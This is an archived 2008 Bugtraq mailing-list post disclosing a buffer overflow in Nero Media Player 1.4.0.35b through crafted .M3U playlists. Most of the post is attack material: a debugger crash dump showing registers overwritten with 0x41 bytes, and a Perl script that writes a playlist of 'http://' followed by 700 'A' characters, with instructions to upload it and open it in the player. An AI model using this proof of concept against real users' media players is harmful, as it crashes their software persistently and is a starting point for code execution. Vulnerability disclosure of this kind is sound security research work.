lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080205153101.10964.qmail@securityfocus.com>
Date: 5 Feb 2008 15:31:01 -0000
From: Securfrog@...il.com
To: bugtraq@...urityfocus.com
Subject: NERO Media  Player <= 1.4.0.35b Remote Buffer Overflow( .M3U)

# NERO Media  Player <= 1.4.0.35b Remote Buffer Overflow( .M3U)
#
#
# This exception may be expected and handled.
# eax=03e90f40 ebx=41414141 ecx=009d01c8 edx=009d015c esi=03e90f38 edi=41414141
# eip=7c92b3fb esp=0010bff8 ebp=0010c214 iopl=0         nv up ei pl nz ac pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210212
# ntdll!wcsncat+0x387:
# 7c92b3fb 8b0b             mov     ecx,[ebx]         ds:0023:41414141=????????
#EXCEPTION_RECORD:  ffffffff -- (.exr ffffffffffffffff)
#ExceptionAddress: 7c92b3fb (ntdll!wcsncat+0x00000387)
#   ExceptionCode: c0000005 (Access violation)
#  ExceptionFlags: 00000000
#NumberParameters: 2
#   Parameter[0]: 00000000
#   Parameter[1]: 41414141
#Attempt to read from address 41414141

my $file="bob_marley_I_Shot_The_Sheriff.m3u";

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 700;
close($FILE);
print "$file has been created \n";
print "Upload it, and open it with Nero Media Player\n";
print "Credits:Securfrog\n";

#Btw , after the crash /*if not exploited  ...*/ you wont be able to open Nero media player , it will constantly crash .

#Regards

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ